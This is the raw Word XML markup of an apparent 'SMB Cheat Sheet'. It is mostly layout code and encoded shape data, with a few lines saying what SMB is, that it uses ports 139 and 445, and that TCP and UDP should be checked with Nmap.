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2E" w:rsidRDefault="00A13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277470</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3340100" cy="380391"/>
                <wp:effectExtent l="0" t="0" r="12700" b="19685"/>
                <wp:wrapNone/>
                <wp:docPr id="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38039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D9E" w:rsidRPr="008F1106" w:rsidRDefault="0028154B" w:rsidP="008F110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" o:spid="_x0000_s1026" style="position:absolute;margin-left:103.65pt;margin-top:21.85pt;width:263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0100,3803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hJiwIAAGUFAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0X52vdm1QpwhSdBhQ&#10;tEXToWdFlmIDsqhRSuzs14+SHbdoiw0YloNCmuQT+Ujq8qqtDdsr9BXYnI9PRpwpK6Go7DbnP55u&#10;vpxz5oOwhTBgVc4PyvOrxedPl42bqwmUYAqFjECsnzcu52UIbp5lXpaqFv4EnLJk1IC1CKTiNitQ&#10;NIRem2wyGp1lDWDhEKTynr5ed0a+SPhaKxnutfYqMJNzyi2kE9O5iWe2uBTzLQpXVrJPQ/xDFrWo&#10;LF06QF2LINgOq3dQdSURPOhwIqHOQOtKqlQDVTMevalmXQqnUi1EjncDTf7/wcq7/QOyqqDecWZF&#10;TS16hJ0t2Jpktq4KxVaAlnr0SFwKuzWKjSNrjfNzCl67B+w1T2KkoNVYx38qjrWJ6cPAtGoDk/Rx&#10;Op1RudQQSbbp+Wh6kUCzl2iHPnxTULMo5BxjUpOYVMwjUS32tz7Q3RR0dCYl5tVlkqRwMComY+yj&#10;0lQn3T1J0WnC1Mog2wuaDSGlsuGsM5WCyk6fT0f0i+XSJUNE0hJgRNaVMQP2+E/YHUzvH0NVGtAh&#10;ePT34CEi3Qw2DMF1ZQE/AjDhSK3u/I8kddRElkK7afsmbqA40EAgdJvinbypqAG3wocHgbQa1DNa&#10;93BPhzbQ5Bx6ibMS8NdH36M/TSxZOWto1XLuf+4EKs7Md0uzfDGezeJuJmV2+nVCCr62bF5b7K5e&#10;AXWM5pWyS2L0D+YoaoT6mV6FZbyVTMJKujvnMuBRWYXuCaB3RarlMrnRPjoRbu3ayQgeCY5j9dQ+&#10;C3T9FAaa3zs4rqWYvxnBzjdGWljuAugqzWekuOO1p552Oc1Q/+7Ex+K1nrxeXsfFbwAAAP//AwBQ&#10;SwMEFAAGAAgAAAAhABc05HrfAAAACgEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAMhu9IvENk&#10;JG4sYZ1a1DWd0KTBCQFbDxyzJmuqNU5p0rV7e8wJjrY//f7+YjO7jl3MEFqPEh4XApjB2usWGwnV&#10;YffwBCxEhVp1Ho2EqwmwKW9vCpVrP+GnuexjwygEQ64k2Bj7nPNQW+NUWPjeIN1OfnAq0jg0XA9q&#10;onDX8aUQKXeqRfpgVW+21tTn/egkfOPh+qqql6+z2Nr0bTd+vFerScr7u/l5DSyaOf7B8KtP6lCS&#10;09GPqAPrJCxFlhAqYZVkwAjIkoQWRyJFkgIvC/6/QvkDAAD//wMAUEsBAi0AFAAGAAgAAAAhALaD&#10;OJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYA&#10;CAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYA&#10;CAAAACEAPyD4SYsCAABlBQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAU&#10;AAYACAAAACEAFzTket8AAAAKAQAADwAAAAAAAAAAAAAAAADlBAAAZHJzL2Rvd25yZXYueG1sUEsF&#10;BgAAAAAEAAQA8wAAAPEFAAAAAA==&#10;" adj="-11796480,,5400" path="m63400,l3276700,v35015,,63400,28385,63400,63400l3340100,380391r,l,380391r,l,63400c,28385,28385,,63400,xe" fillcolor="#70ad47 [3209]" strokecolor="#375623 [1609]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:formulas/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="63400,0;3276700,0;3340100,63400;3340100,380391;3340100,380391;0,380391;0,380391;0,63400;63400,0" o:connectangles="0,0,0,0,0,0,0,0,0" textboxrect="0,0,3340100,380391"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="005F0D9E" w:rsidRPr="008F1106" w:rsidRDefault="0028154B" w:rsidP="008F110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 w:rsidR="0056772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614477</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-321869</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4791456" cy="482803"/>
                <wp:effectExtent l="0" t="0" r="28575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56" cy="482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72E" w:rsidRPr="0056772E" w:rsidRDefault="0056772E" w:rsidP="0056772E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72E">
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="E7E6E6" w:themeColor="background2"/>
                                <w:spacing w:val="10"/>
                                <w:sz w:val="4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SMB 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7" style="position:absolute;margin-left:48.4pt;margin-top:-25.35pt;width:377.3pt;height:3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6teQIAAE0FAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0X+1kST+COkXQosOA&#10;oi3aDj0rshQbkEWNUmJnv36U7LhFW2zAMB9kSiQfySdS5xddY9hOoa/BFnxylHOmrISytpuC/3i6&#10;/nLKmQ/ClsKAVQXfK88vlp8/nbduoaZQgSkVMgKxftG6glchuEWWeVmpRvgjcMqSUgM2ItAWN1mJ&#10;oiX0xmTTPD/OWsDSIUjlPZ1e9Uq+TPhaKxnutPYqMFNwyi2kFdO6jmu2PBeLDQpX1XJIQ/xDFo2o&#10;LQUdoa5EEGyL9TuoppYIHnQ4ktBkoHUtVaqBqpnkb6p5rIRTqRYix7uRJv//YOXt7h5ZXRb8bM6Z&#10;FQ3d0QOxJuzGKEZnRFDr/ILsHt09DjtPYqy209jEP9XBukTqfiRVdYFJOpydnE1m82POJOlmp9PT&#10;/GsEzV68HfrwTUHDolBwpPCJS7G78aE3PZiQX8ymj5+ksDcqpmDsg9JUCEWcJu/UQurSINsJunwh&#10;pbJhUFWiVP3xPKdvyGf0SNklwIisa2NG7MmfsPtcB/voqlIHjs75351HjxQZbBidm9oCfgRgwmQo&#10;QPf2B5J6aiJLoVt36ZKTZTxZQ7mni0foJ8I7eV0T+zfCh3uBNAI0LDTW4Y4WbaAtOAwSZxXgr4/O&#10;oz11Jmk5a2mkCu5/bgUqzsx3Sz1LfTCLM5g2s/nJlDb4WrN+rbHb5hLo4ib0gDiZxGgfzEHUCM0z&#10;Tf8qRiWVsJJiF1wGPGwuQz/q9H5ItVolM5o7J8KNfXQygkeeY3c9dc8C3dCCgZr3Fg7jJxZvOrG3&#10;jZ4WVtsAuk5t+sLrcAM0s6mVhvclPgqv98nq5RVc/gYAAP//AwBQSwMEFAAGAAgAAAAhANwGafHg&#10;AAAACQEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAQRO9I/QdrK/WCWqeFhDbEqapKcEQloJ7d&#10;eIlD7XUUu2ng6zEnOI5mNPOm2I7WsAF73zoSsFwkwJBqp1pqBLy/Pc3XwHyQpKRxhAK+0MO2nNwU&#10;MlfuSq84VKFhsYR8LgXoELqcc19rtNIvXIcUvQ/XWxmi7BuuenmN5dbwVZJk3MqW4oKWHe411ufq&#10;YgWYY7U32e3wog7fx7N+VuMm/dRCzKbj7hFYwDH8heEXP6JDGZlO7kLKMyNgk0XyIGCeJg/AYmCd&#10;Lu+BnQSs0jvgZcH/Pyh/AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEA&#10;AAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAI1tnq15AgAATQUA&#10;AA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhANwGafHgAAAA&#10;CQEAAA8AAAAAAAAAAAAAAAAA0wQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADgBQAA&#10;AAA=&#10;" fillcolor="#ed7d31 [3205]" strokecolor="#823b0b [1605]" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="0056772E" w:rsidRPr="0056772E" w:rsidRDefault="0056772E" w:rsidP="0056772E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72E">
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="E7E6E6" w:themeColor="background2"/>
                          <w:spacing w:val="10"/>
                          <w:sz w:val="4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SMB Cheat Sheet</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F0D9E" w:rsidRDefault="005F0D9E"/>
    <w:p w:rsidR="005F0D9E" w:rsidRPr="005F0D9E" w:rsidRDefault="008F1106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88900</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="406400" cy="279400"/>
                <wp:effectExtent l="38100" t="0" r="0" b="4445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1CA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220pt;margin-top:7pt;width:32pt;height:2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d/dQIAAEAFAAAOAAAAZHJzL2Uyb0RvYy54bWysVFFP2zAQfp+0/2D5fSTtCoyKFFUgpkkI&#10;EDDx7Dp2E8n2eWe3affrd3bSgADtYVoenLPv7ru7z3c+v9hZw7YKQwuu4pOjkjPlJNStW1f859P1&#10;l2+chShcLQw4VfG9Cvxi8fnTeefnagoNmFohIxAX5p2veBOjnxdFkI2yIhyBV46UGtCKSFtcFzWK&#10;jtCtKaZleVJ0gLVHkCoEOr3qlXyR8bVWMt5pHVRkpuKUW8wr5nWV1mJxLuZrFL5p5ZCG+IcsrGgd&#10;BR2hrkQUbIPtOyjbSoQAOh5JsAVo3UqVa6BqJuWbah4b4VWuhcgJfqQp/D9Yebu9R9bWFf9KN+WE&#10;pTu6gs6xJSJ0jA6Joc6HORk++nscdoHEVO5Oo01/KoTtMqv7kVW1i0zS4aw8mZXEvSTV9PQsyYRS&#10;vDh7DPG7AsuSUPGawufomVCxvQmxtz/YkXPKqM8hS3FvVErDuAelqRqKOs3euY/UpUG2FdQBQkrl&#10;4qRXNaJW/fFxSd+Q1OiRU8yACVm3xozYA0Dq0ffYfa6DfXJVuQ1H5/JvifXOo0eODC6OzrZ1gB8B&#10;GKpqiNzbH0jqqUksraDe010j9EMQvLxuifAbEeK9QOp6uiOa5HhHizbQVRwGibMG8PdH58mempG0&#10;nHU0RRUPvzYCFWfmh6M2PZvMZmns8mZ2fDqlDb7WrF5r3MZeAl3ThN4ML7OY7KM5iBrBPtPAL1NU&#10;UgknKXbFZcTD5jL2001PhlTLZTajUfMi3rhHLxN4YjX10tPuWaAfui5Su97CYeLE/E3f9bbJ08Fy&#10;E0G3uSlfeB34pjHNjTM8KekdeL3PVi8P3+IPAAAA//8DAFBLAwQUAAYACAAAACEACF3TVdoAAAAJ&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbExPy07DMBC8I/UfrEXiRu3QgKoQp6qQ4AxthDi68ZIE7HWI&#10;3Tbw9d2e6GlnNaN5lKvJO3HAMfaBNGRzBQKpCbanVkO9fb5dgojJkDUuEGr4xQiranZVmsKGI73h&#10;YZNawSYUC6OhS2kopIxNh97EeRiQmPsMozeJ37GVdjRHNvdO3in1IL3piRM6M+BTh833Zu81/PWy&#10;Uf71PamPxc/XS+bqbEG11jfX0/oRRMIp/YvhXJ+rQ8WddmFPNgqnIc8Vb0lM5HxZcK/OYMdgqUBW&#10;pbxcUJ0AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAA&#10;AFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAA&#10;AAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAk8nnf3UCAABABQAADgAAAAAAAAAA&#10;AAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEACF3TVdoAAAAJAQAADwAAAAAA&#10;AAAAAAAAAADPBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANYFAAAAAA==&#10;" adj="10800" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F0D9E" w:rsidRPr="005F0D9E" w:rsidRDefault="008F1106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82550</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3308350" cy="895350"/>
                <wp:effectExtent l="0" t="0" r="254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D9E" w:rsidRPr="008F1106" w:rsidRDefault="008F1106" w:rsidP="008F1106">
                            <w:r w:rsidRPr="008F1106">
                              <w:t xml:space="preserve">- </w:t>
                            </w:r>
                            <w:r w:rsidR="005F0D9E" w:rsidRPr="008F1106">
                              <w:t>SMB= Server Message Block</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="005F0D9E" w:rsidRPr="008F1106" w:rsidRDefault="005F0D9E" w:rsidP="008F1106">
                            <w:r w:rsidRPr="008F1106">
                              <w:t>- SMB is a Windows implementation of a file-sharing</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="005F0D9E" w:rsidRPr="008F1106" w:rsidRDefault="002D3673" w:rsidP="008F1106">
                            <w:r>
                              <w:t>- SMB uses ports 139 and</w:t>
                            </w:r>
                            <w:r w:rsidR="005F0D9E" w:rsidRPr="008F1106">
                              <w:t xml:space="preserve"> 445</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="005F0D9E" w:rsidRDefault="005F0D9E" w:rsidP="005F0D9E">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                          </w:p>
                          <w:p w:rsidR="005F0D9E" w:rsidRDefault="005F0D9E" w:rsidP="005F0D9E">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                          </w:p>
                          <w:p w:rsidR="005F0D9E" w:rsidRDefault="005F0D9E" w:rsidP="005F0D9E">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                          </w:p>
                          <w:p w:rsidR="005F0D9E" w:rsidRDefault="005F0D9E" w:rsidP="005F0D9E">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                          </w:p>
                          <w:p w:rsidR="005F0D9E" w:rsidRDefault="005F0D9E" w:rsidP="005F0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03.5pt;margin-top:6.5pt;width:260.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y8bgIAADUFAAAOAAAAZHJzL2Uyb0RvYy54bWysVG1r2zAQ/j7YfxD6vjpJm60NdUpo6RiU&#10;NvSFflZkKTGTdNpJiZ39+p1kxy1dYWPsi3zyvT/3nM4vWmvYTmGowZV8fDTiTDkJVe3WJX96vP50&#10;ylmIwlXCgFMl36vAL+YfP5w3fqYmsAFTKWQUxIVZ40u+idHPiiLIjbIiHIFXjpQa0IpIV1wXFYqG&#10;oltTTEajz0UDWHkEqUKgv1edks9zfK2VjHdaBxWZKTnVFvOJ+Vyls5ifi9kahd/Usi9D/EMVVtSO&#10;kg6hrkQUbIv1b6FsLREC6HgkwRagdS1V7oG6GY/edPOwEV7lXgic4AeYwv8LK293S2R1VfIJZ05Y&#10;GtE9bF2lKnZP4Am3NopNEkyNDzOyfvBL7G+BxNRzq9GmL3XD2gztfoBWtZFJ+nl8PDo9ntIEJOlO&#10;z6ZJpjDFi7fHEL8qsCwJJcdURSohwyp2NyF29gc7ck4ldUVkKe6NSnUYd6809URpx9k7s0ldGmQ7&#10;QTwQUioXp33+bJ3cdG3M4Dj5s2Nvn1xVZtrg/BdZB4+cGVwcnG3tAN/LXn0f9yXrzv6AQNd3giC2&#10;q7YfZj+jFVR7GjBCx/zg5XVN+N6IEJcCieo0ElrfeEeHNtCUHHqJsw3gz/f+J3tiIGk5a2h1Sh5+&#10;bAUqzsw3R9w8G5+cpF3Ll5Pplwld8LVm9VrjtvYSaCpjeii8zGKyj+YgagT7TFu+SFlJJZyk3CWX&#10;EQ+Xy9itNL0TUi0W2Yz2y4t44x68PPAgUeexfRboe5JFouctHNZMzN7QrLNNE3Kw2EbQdeZgQrrD&#10;tZ8A7Wamcv+OpOV/fc9WL6/d/BcAAAD//wMAUEsDBBQABgAIAAAAIQCkKEiU2gAAAAoBAAAPAAAA&#10;ZHJzL2Rvd25yZXYueG1sTE/JTsMwEL0j8Q/WVOJG7ZpCqhCnoggOHCl8wDR2k6jxOIqdBb6e4QSn&#10;Wd7TW4r94jsxuSG2gQxs1gqEoyrYlmoDnx+vtzsQMSFZ7AI5A18uwr68viowt2GmdzcdUy1YhGKO&#10;BpqU+lzKWDXOY1yH3hFj5zB4THwOtbQDzizuO6mVepAeW2KHBnv33Ljqchy9gRd7ONu3C43Zwcf+&#10;e95qVJM25ma1PD2CSG5Jf2T4jc/RoeRMpzCSjaIzoFXGXRIDdzyZkOkdLyd+3G8VyLKQ/yuUPwAA&#10;AP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRl&#10;bnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8B&#10;AABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBUg2y8bgIAADUFAAAOAAAAAAAAAAAAAAAAAC4C&#10;AABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCkKEiU2gAAAAoBAAAPAAAAAAAAAAAAAAAA&#10;AMg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5F0D9E" w:rsidRPr="008F1106" w:rsidRDefault="008F1106" w:rsidP="008F1106">
                      <w:r w:rsidRPr="008F1106">
                        <w:t xml:space="preserve">- </w:t>
                      </w:r>
                      <w:r w:rsidR="005F0D9E" w:rsidRPr="008F1106">
                        <w:t>SMB= Server Message Block</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="005F0D9E" w:rsidRPr="008F1106" w:rsidRDefault="005F0D9E" w:rsidP="008F1106">
                      <w:r w:rsidRPr="008F1106">
                        <w:t>- SMB is a Windows implementation of a file-sharing</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="005F0D9E" w:rsidRPr="008F1106" w:rsidRDefault="002D3673" w:rsidP="008F1106">
                      <w:r>
                        <w:t>- SMB uses ports 139 and</w:t>
                      </w:r>
                      <w:r w:rsidR="005F0D9E" w:rsidRPr="008F1106">
                        <w:t xml:space="preserve"> 445</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="005F0D9E" w:rsidRDefault="005F0D9E" w:rsidP="005F0D9E">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                    </w:p>
                    <w:p w:rsidR="005F0D9E" w:rsidRDefault="005F0D9E" w:rsidP="005F0D9E">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                    </w:p>
                    <w:p w:rsidR="005F0D9E" w:rsidRDefault="005F0D9E" w:rsidP="005F0D9E">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                    </w:p>
                    <w:p w:rsidR="005F0D9E" w:rsidRDefault="005F0D9E" w:rsidP="005F0D9E">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                    </w:p>
                    <w:p w:rsidR="005F0D9E" w:rsidRDefault="005F0D9E" w:rsidP="005F0D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F0D9E" w:rsidRPr="005F0D9E" w:rsidRDefault="005F0D9E" w:rsidP="005F0D9E"/>
    <w:p w:rsidR="005F0D9E" w:rsidRPr="005F0D9E" w:rsidRDefault="005F0D9E" w:rsidP="005F0D9E"/>
    <w:p w:rsidR="005F0D9E" w:rsidRPr="005F0D9E" w:rsidRDefault="005F0D9E" w:rsidP="005F0D9E"/>
    <w:p w:rsidR="005F0D9E" w:rsidRPr="005F0D9E" w:rsidRDefault="008F1106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163F9" wp14:editId="71C52D35">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2197100</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>184785</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1454150" cy="387350"/>
                <wp:effectExtent l="0" t="0" r="12700" b="12700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873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D9E" w:rsidRPr="008F1106" w:rsidRDefault="005F0D9E" w:rsidP="005F0D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F1106">
                              <w:rPr>
                                <w:sz w:val="32"/>
                              </w:rPr>
                              <w:t>Nmap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63F9" id="Round Same Side Corner Rectangle 3" o:spid="_x0000_s1029" style="position:absolute;margin-left:173pt;margin-top:14.55pt;width:114.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38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LpjgIAAGwFAAAOAAAAZHJzL2Uyb0RvYy54bWysVNtu2zAMfR+wfxD0vjrOpeuCOkWQosOA&#10;oi2aDn1WZCk2IIsapcTJvn6U7LhFV2zAsDwolEkekYeXy6tDY9heoa/BFjw/G3GmrISyttuCf3+6&#10;+XTBmQ/ClsKAVQU/Ks+vFh8/XLZursZQgSkVMgKxft66glchuHmWeVmpRvgzcMqSUgM2ItAVt1mJ&#10;oiX0xmTj0eg8awFLhyCV9/T1ulPyRcLXWslwr7VXgZmCU2whnZjOTTyzxaWYb1G4qpZ9GOIfomhE&#10;benRAepaBMF2WP8G1dQSwYMOZxKaDLSupUo5UDb56E0260o4lXIhcrwbaPL/D1be7R+Q1WXBJ5xZ&#10;0VCJHmFnS7Ymma3rUrEVoKUaPRKXwm6NYpPIWuv8nJzX7gH7mycxUnDQ2MR/So4dEtPHgWl1CEzS&#10;x3w6m+YzKogk3eTi84RkgslevB368FVBw6JQcIxBjWNQMY5Etdjf+tA5nYwJIcbVRZKkcDQqBmPs&#10;o9KUJ709Tt6pw9TKINsL6g0hpbLhvFNVgtJOn2cj+vWRDR4pzgQYkXVtzICd/wm7i7W3j64qNejg&#10;PPq78+CRXgYbBuemtoDvAZiQ9wnozv5EUkdNZCkcNoe+B/pabqA8Ul8gdAPjnbypqQ63wocHgTQh&#10;VDqa+nBPhzbQFhx6ibMK8Od736M9NS5pOWtp4gruf+wEKs7MN0st/SWfTuOIpst09nlMF3yt2bzW&#10;2F2zAipcTvvFySRG+2BOokZonmk5LOOrpBJW0tsFlwFPl1XoNgGtF6mWy2RGY+lEuLVrJyN45Dl2&#10;19PhWaDrmzFQG9/BaTrF/E0ndrbR08JyF0DXqU0j0x2vfQVopFMr9esn7ozX92T1siQXvwAAAP//&#10;AwBQSwMEFAAGAAgAAAAhAIgYb7/hAAAACQEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAQRO9I&#10;/IO1SFwQtdPSkoY4FaJCQj0gKChnN16SiHgdxW6b/D3LCY6zM5p9k29G14kTDqH1pCGZKRBIlbct&#10;1Ro+P55vUxAhGrKm84QaJgywKS4vcpNZf6Z3PO1jLbiEQmY0NDH2mZShatCZMPM9EntffnAmshxq&#10;aQdz5nLXyblSK+lMS/yhMT0+NVh9749OQ1mmCzmW6qZ6mV7fpnTayl3can19NT4+gIg4xr8w/OIz&#10;OhTMdPBHskF0GhZ3K94SNczXCQgOLO+XfDhoWKsEZJHL/wuKHwAAAP//AwBQSwECLQAUAAYACAAA&#10;ACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQIt&#10;ABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQIt&#10;ABQABgAIAAAAIQCXs1LpjgIAAGwFAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBL&#10;AQItABQABgAIAAAAIQCIGG+/4QAAAAkBAAAPAAAAAAAAAAAAAAAAAOgEAABkcnMvZG93bnJldi54&#10;bWxQSwUGAAAAAAQABADzAAAA9gUAAAAA&#10;" adj="-11796480,,5400" path="m64560,l1389590,v35656,,64560,28904,64560,64560l1454150,387350r,l,387350r,l,64560c,28904,28904,,64560,xe" fillcolor="#70ad47 [3209]" strokecolor="#375623 [1609]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:formulas/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="64560,0;1389590,0;1454150,64560;1454150,387350;1454150,387350;0,387350;0,387350;0,64560;64560,0" o:connectangles="0,0,0,0,0,0,0,0,0" textboxrect="0,0,1454150,387350"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="005F0D9E" w:rsidRPr="008F1106" w:rsidRDefault="005F0D9E" w:rsidP="005F0D9E">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="008F1106">
                        <w:rPr>
                          <w:sz w:val="32"/>
                        </w:rPr>
                        <w:t>Nmap Scripts</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F0D9E" w:rsidRDefault="005F0D9E" w:rsidP="005F0D9E"/>
    <w:p w:rsidR="006D4D16" w:rsidRDefault="009F6E91" w:rsidP="005F0D9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80D258" wp14:editId="16123B75">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2767432</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5512</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="406400" cy="279400"/>
                <wp:effectExtent l="38100" t="0" r="0" b="44450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E6304" id="Down Arrow 90" o:spid="_x0000_s1026" type="#_x0000_t67" style="position:absolute;margin-left:217.9pt;margin-top:.45pt;width:32pt;height:2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yhdAIAAEAFAAAOAAAAZHJzL2Uyb0RvYy54bWysVMFu2zAMvQ/YPwi6r3aCtF2COkXQosOA&#10;oi3WDj0rshQbkESNUuJkXz9KdtyiLXYY5oNMieQj+UTq4nJvDdspDC24ik9OSs6Uk1C3blPxn083&#10;X75yFqJwtTDgVMUPKvDL5edPF51fqCk0YGqFjEBcWHS+4k2MflEUQTbKinACXjlSakArIm1xU9Qo&#10;OkK3ppiW5VnRAdYeQaoQ6PS6V/JlxtdayXivdVCRmYpTbjGvmNd1WovlhVhsUPimlUMa4h+ysKJ1&#10;FHSEuhZRsC2276BsKxEC6HgiwRagdStVroGqmZRvqnlshFe5FiIn+JGm8P9g5d3uAVlbV3xO9Dhh&#10;6Y6uoXNshQgdo0NiqPNhQYaP/gGHXSAxlbvXaNOfCmH7zOphZFXtI5N0OCvPZiWBS1JNz+dJJpTi&#10;xdljiN8UWJaEitcUPkfPhIrdbYi9/dGOnFNGfQ5ZigejUhrG/VCaqqGo0+yd+0hdGWQ7QR0gpFQu&#10;TnpVI2rVH5+W9A1JjR45xQyYkHVrzIg9AKQefY/d5zrYJ1eV23B0Lv+WWO88euTI4OLobFsH+BGA&#10;oaqGyL39kaSemsTSGuoD3TVCPwTBy5uWCL8VIT4IpK6nO6JJjve0aANdxWGQOGsAf390nuypGUnL&#10;WUdTVPHwaytQcWa+O2rT+WQ2S2OXN7PT8ylt8LVm/VrjtvYK6Jom9GZ4mcVkH81R1Aj2mQZ+laKS&#10;SjhJsSsuIx43V7GfbnoypFqtshmNmhfx1j16mcATq6mXnvbPAv3QdZHa9Q6OEycWb/qut02eDlbb&#10;CLrNTfnC68A3jWlunOFJSe/A6322enn4ln8AAAD//wMAUEsDBBQABgAIAAAAIQACf3OE2gAAAAcB&#10;AAAPAAAAZHJzL2Rvd25yZXYueG1sTI7BTsMwEETvSPyDtUjcqB0SEAlxKoQEZ2gjxNGNlyRgr0Ps&#10;toGvZznBbUYzmnn1evFOHHCOYyAN2UqBQOqCHanX0G4fLm5AxGTIGhcINXxhhHVzelKbyoYjPeNh&#10;k3rBIxQro2FIaaqkjN2A3sRVmJA4ewuzN4nt3Es7myOPeycvlbqW3ozED4OZ8H7A7mOz9xq+R9kp&#10;//SS1Gv++f6YuTbLqdX6/Gy5uwWRcEl/ZfjFZ3RomGkX9mSjcBqK/IrRk4YSBMdFWbLdsShKkE0t&#10;//M3PwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAA&#10;W0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAA&#10;AAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCF1vyhdAIAAEAFAAAOAAAAAAAAAAAA&#10;AAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQACf3OE2gAAAAcBAAAPAAAAAAAA&#10;AAAAAAAAAM4EAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA1QUAAAAA&#10;" adj="10800" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F0D9E" w:rsidRPr="00F877C1" w:rsidRDefault="005F0D9E" w:rsidP="005F0D9E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F877C1">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>* Always check both TCP and UDP ports using Nmap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  <w:gridCol w:w="4609"/>
      </w:tblGrid>
